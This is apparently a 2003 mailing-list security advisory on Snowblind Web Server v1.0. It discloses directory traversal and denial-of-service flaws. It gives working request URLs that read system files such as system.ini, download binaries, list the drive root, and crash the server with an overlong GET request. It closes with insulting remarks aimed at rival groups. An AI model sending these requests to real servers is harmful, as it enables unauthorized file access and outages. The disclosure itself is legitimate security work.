=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: Snowblind Web Server: multiple issues product: Snowblind Web Server v1.0 vendor: www.snowblind.net risk: high date: 05/16/2k3 tested platform: Windows 98 Second Edition discovered by: euronymous /F0KP advisory urls: http://f0kp.iplus.ru/bz/022.en.txt http://f0kp.iplus.ru/bz/022.ru.txt contact email: euronymousat_private =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= description ----------- i have found couple issues in this http-server. they are: directory traversal and DoS attacks. directory traversal ------------------- 1. you can read and download any file out of webroot: http://hostname/../../windows/system.ini or http://hostname/internal.sws?../../windows/system.ini 2. also you can download any binary file in this manner: http://hostname/internal.sws?../../windows/calc.exe this request will download program file calc.exe with name internal.sws http://hostname/internal.sws?sws.exe download webserver itself )). 3. directory listing out of webroot. note: this bug will works if only `Allow directory listings' is turned on [ in default its do ]. http://hostname/.../ will print contents of root directory on that disk drive. Denial of Service ----------------- 1. this url will crash webserver: http://localhost/ 2. if you send GET request, that contains more >=219 charakterz, then you will crash the server.. request example: GET /fff[ x 129 ]ffff HTTP/1.0 shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru, N0b0d13s Team and all russian security guyz!! to kate especially )) hates: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb lamers team == yeah, i really __HATE__ yours!! ================ im not a lame, not yet a hacker ================
This archive was generated by hypermail 2b30 : Fri May 16 2003 - 13:37:14 PDT